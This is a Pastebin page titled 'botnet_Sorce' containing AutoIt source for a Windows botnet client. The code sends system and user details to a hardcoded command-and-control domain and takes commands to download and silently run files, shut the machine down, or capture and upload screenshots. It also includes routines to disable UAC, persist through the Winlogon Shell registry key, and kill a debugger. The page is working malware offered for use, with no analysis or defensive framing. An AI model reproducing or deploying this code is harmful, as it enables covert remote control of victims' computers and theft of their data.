bedtech891

botnet_Sorce

Mar 26th, 2021
755
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #NoTrayIcon
  2. ;#RequireAdmin
  3. #include <File.au3>
  4. #include <Misc.au3>
  5. #include <string.au3>
  6. #include <crypt.au3>
  7. #include <ScreenCapture.au3>
  8.  
  9. ;Mutex
  10. ;------
  11.  
  12. ;Singleton("7563545689855477")
  13.  
  14. ;HWID
  15. ;------
  16.  
  17. Global $hwid = id()
  18.  
  19. ;disable uac
  20. ;------
  21.  
  22. if IsAdmin() Then
  23.     ;_Disable_UAC()
  24. EndIf
  25.  
  26. ;SETTING VARIABLES
  27. ;------
  28. $mainHome      =             "http://jlibs8080.no-ip.biz"    ;main domain
  29. $mainDir      =             "/bnt2/"
  30. $upshot      = $mainHome & $mainDir &    "u.php"            ;path to upload file
  31. $serverHome     = $mainHome & $mainDir &    "s.php"            ;path to server file
  32. $cmdDir      = $mainHome & $mainDir &    "dir.php"            ;path to commandDir file
  33.  
  34. ;------above = url[/]------below = local path[\]------
  35. $subDir      = "\n0625d6982e9krf824\"
  36. $filei      = "\jhgr78.log"            ;update log - make random VIA builder
  37.  
  38. ;------
  39. $interv      = 5
  40. $counter      = $interv * 1000 * 60            ;15 minutes
  41. ;------
  42.  
  43. $timeInit = TimerInit()
  44. Global $result
  45. Global $ip     = @IPAddress1
  46. ;Do On Start Up
  47. ;------
  48.  
  49. ;FileMove(@ScriptFullPath, @TempDir & $subDir &  "hvn.exe", 9)
  50.  
  51. if(FileExists(@TempDir & $subDir) <> 1) Then
  52.    DirCreate(@TempDir & $subDir)
  53. EndIf
  54.  
  55. ;$reg = RegWrite('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run', @ScriptName, 'REG_SZ', @TempDir & $subDir & 'hvn.exe')
  56. ;_Run(@ScriptFullPath)
  57.  
  58. ;Anti Debugger
  59. ;------
  60.  
  61. $process = "OLLYDBG.EXE"
  62.  
  63. If ProcessExists($process) Then
  64.    ProcessClose($process)
  65. EndIf
  66.  
  67. ;Initial update
  68. ;------
  69.  
  70. _Update($filei)
  71.  
  72. ;UPDATE
  73. ;------
  74. While 1
  75.    While 1
  76.  
  77.       $updateTime = TimerDiff($timeInit)
  78.  
  79.       if $updateTime > $counter Then
  80.       ;ConsoleWrite("test")
  81.       ;$command     = InetRead($cmdDir,1)
  82.       $Command      = _Update($filei)
  83.  
  84.       if $command == "-1" Or StringLeft($command,3)  == "<br" Then
  85.  
  86.       $interv     = Random(5,30,1)
  87.       $counter     = $interv * 1000 * 60
  88.       $timeInit     = TimerInit()
  89.       ExitLoop
  90.  
  91.       EndIf
  92.  
  93.       $process    = BinaryToString($command)
  94.       $comS      = StringSplit($process,"|")
  95.       $uComs     = UBound($comS) - 1
  96.       Global $commandVal[$uComs+1][10]
  97.  
  98.       for $j = 1 to $uComs
  99.  
  100.       $cMas     = StringSplit($comS[$j],",")
  101.       $uCmas = UBound($cMas) - 1
  102.  
  103.       for $l = 1 to $uCmas
  104.  
  105.             $commandVal[$j][$l] = $cMas[$l]
  106.  
  107.       Next
  108.       Next
  109.  
  110.       $uCommandVal = UBound($commandVal)-1
  111.  
  112.       for $j = 1 to $uCommandVal
  113.  
  114.       Switch $commandval[$j][1]
  115.  
  116.             Case 1
  117.  
  118.              _DlnEx($commandval[$j][2],$commandval[$j][3],1,1,$commandval[$j][4]) ;DL n EX
  119.  
  120.             Case 2
  121.  
  122.              _DlnEx($commandval[$j][2],$commandval[$j][3],1) ;DL
  123.  
  124.             Case 3
  125.  
  126.              _DlnEx("",$commandval[$j][3],0,1,$commandval[$j][4])
  127.  
  128.             Case 4
  129.  
  130.              ;haha($commandval[$j][1])
  131.              Shutdown(6)
  132.  
  133.             Case 5
  134.  
  135.              $scrnName = Random(12,999999,1) & ".jpg"
  136.              _ScreenCapture_Capture(@ScriptDir & "\" & $scrnName)
  137.              ScrnUp($scrnName)
  138.              FileDelete(@ScriptDir & "\" & "*.jpg")
  139.  
  140.       EndSwitch
  141.  
  142.       Next
  143.  
  144.       ;//////---end of update---//////
  145.       ;reset time
  146.       ;------
  147.  
  148.       ;$interv     = Random(5,30,1)
  149.       ;$counter     = $interv * 1000 * 60
  150.       Sleep(500)
  151.       $timeInit = TimerInit()
  152.       EndIf
  153.  
  154.       Sleep(50)
  155.  
  156.    WEnd
  157. WEnd
  158. ;//////---Functions---//////
  159.  
  160. ;------
  161. ;HWID
  162.  
  163. func id()
  164.    $disc = StringLeft(@SystemDir, 3)
  165.    $start = "0" & @CPUArch & @KBLayout & DriveGetSerial("C:\") & StringUpper(DriveGetType($disc)) & DriveSpaceTotal ($disc)
  166.    $hwid1  = StringMid($start, Round(StringLen($start)/2), Round(StringLen($start)/2))
  167.    $hwid2 = _StringToHex(stringReverse($hwid1))
  168.    $final = $start & $hwid2
  169.    $start = _Crypt_HashData($Final,$CALG_MD5)
  170.    $epicFinal = StringMid($start,1,8)  & ":" &  StringMid($start,8,16)
  171.  
  172.    Return StringSplit($epicFinal, ":")
  173. EndFunc
  174.  
  175. ;------
  176. ;MUTEX
  177.  
  178. Func Singleton($semaphore)
  179.     Local $ERROR_ALREADY_EXISTS = 183
  180.     DllCall("kernel32.dll", "int", "CreateSemaphore", "int", 0, "long", 1, "long", 1, "str", $semaphore)
  181.     Local $lastError = DllCall("kernel32.dll", "int", "GetLastError")
  182.     If $lastError[0] = $ERROR_ALREADY_EXISTS Then Exit -1
  183. EndFunc
  184.  
  185. ;------
  186. ;Disable UAC
  187.  
  188. Func _Disable_UAC()
  189.     If @OSArch = "X64" Then
  190.       $pref = "64"
  191.     Else
  192.       $pref = ""
  193.     EndIf
  194.     $r1 = RegWrite("HKLM" & $pref & "\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" ,"ConsentPromptBehaviorAdmin", "REG_DWORD", "0")
  195.     $r2 = RegWrite("HKLM" & $pref & "\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" ,"EnableLUA", "REG_DWORD", "0")
  196.     Sleep(500)
  197.     If $r1 + $r2 = 2 Then
  198.       Return True
  199.     Else
  200.       Return False
  201.     EndIf
  202. EndFunc
  203.  
  204. ;------
  205. ;StartUp
  206.  
  207. Func _run($file, $type = 1)
  208.    $ret = False
  209.    $arun = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell")
  210.    if StringInStr($arun, @ScriptName) = 0 Then
  211.       $name = @ScriptName
  212.       FileCopy($file, @WindowsDir & "\" & $name, 1)
  213.       $ret = RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", $arun & "," & $name)
  214.    EndIf
  215.    Return $ret
  216. EndFunc
  217.  
  218. ;------
  219. ;update
  220.  
  221. Func _Update($updateFile)
  222.  
  223. Global $ip     = @IPAddress1
  224. $compName     = @ComputerName
  225. $os      = @OSVersion
  226. $userName     = @UserName
  227. $Name      = $hWID[1]
  228. $password    = $hwid[2]
  229.  
  230. $memStats = MemGetStats()
  231.  
  232. _FileWriteLog(@TempDir & $updateFile, "Percent memery usage - " & $memStats[0] & " # ")
  233.  
  234. $infoz     = FileOpen(@TempDir & $updateFile)
  235. $infozz = FileRead($infoz)
  236.  
  237. $serverdata = '&username=' & $name & '&password=' & $password & '&os=' & $os & '&oigh=' & $infozz & '&ip=' & $ip & '&name=' & $userName & '&compName=' & $compName
  238. $oHTTP = ObjCreate("winhttp.winhttprequest.5.1")
  239. $oHTTP.Open("POST", $serverHome, False)
  240. $oHTTP.SetRequestHeader("Content-Type","application/x-www-form-urlencoded")
  241. $oHTTP.Send($serverdata)
  242. $oReceived = $oHTTP.ResponseText
  243. FileClose($infoz)
  244.  
  245. ConsoleWrite($oReceived & @CRLF)
  246.  
  247. FileDelete(@TempDir & $updateFile)
  248. Return $oReceived
  249. ;Exit
  250. EndFunc
  251.  
  252. ;------
  253. ;DL n EX
  254.  
  255. Func _DlnEx($DlURL="",$DlFileName="",$DwnL = 0,$DlnEx = 0,$exeParams="")
  256.  
  257.    $result = ""
  258.  
  259.       If $Dwnl == 1 Then
  260.       $dlget = InetGet($DlURL,@TempDir & $subDir & $DlFileName)
  261.       InetClose($dlget)
  262.  
  263.       If $dlget <> 0 Then
  264.       $result &= "dl-succ-" & $DlFileName
  265.       Else
  266.       $result &= "dl-error-fail-" & $DlFileName
  267.       EndIf
  268.       EndIf
  269.  
  270.       If $DlnEx == 1 Then
  271.  
  272.       ShellExecute($DlFileName,$exeParams,@TempDir & $subDir,"open",@SW_HIDE)
  273.       Sleep(500)
  274.  
  275.       $dlNexPrcExs = ProcessExists($DlFileName)
  276.  
  277.       If $dlNexPrcExs <> 0 Then
  278.       $result &= "-exe-true-" & $DlFileName & "-pid=" & $dlNexPrcExs & "-"
  279.       Else
  280.       $result &= "-exe-FAIL-To-Start-" & $DlFileName
  281.       EndIf
  282.  
  283.       EndIf
  284.  
  285.    _FileWriteLog(@TempDir & $filei, $result)
  286.  
  287. EndFunc
  288.  
  289. ;------
  290. ;upload scrnshot
  291.  
  292. Func ScrnUp($scrnFile)
  293.  
  294. Local $picOpen      = FileOpen(@ScriptDir & "\" & $scrnFile,16)
  295. Local $picRead      = FileRead($picOpen)
  296. Local $boundary     = "a65h7a"             & @CRLF
  297. Local $boundary2     = "--" & $boundary
  298. Local $binary      = "Content-Transfer-Encoding: binary"     & @CRLF
  299. local $typeCon      = "Content-Type: txt/html"             & @CRLF & @CRLF
  300.  
  301. Local $postData = $boundary2
  302.  
  303.       $postData &= 'Content-Disposition: form-data; name="file[]"; filename="' & $hwid[2] & '"' & @CRLF
  304.       $postData &= $typeCon
  305.       $postData &= $picRead & @CRLF
  306.       $postData &= "--a65h7a--";End of HTTP HEADER
  307.  
  308. $oHTTP = ObjCreate("winhttp.winhttprequest.5.1")
  309. $oHTTP.Open("POST", $upshot, False)
  310. $oHTTP.SetRequestHeader("Content-Type", "multipart/form-data; boundary=" & $boundary)
  311. $oHTTP.Send($postData)
  312. $oReceived = $oHTTP.ResponseText
  313.  
  314. FileClose($picOpen)
  315.  
  316. EndFunc
  317. ;------
  318. ;debug Purpuses
  319. func haha($var)
  320.  
  321. ConsoleWrite("haha it worked" & @CRLF)
  322. ConsoleWrite($var & @CRLF)
  323.  
  324. EndFunc
RAW Paste Data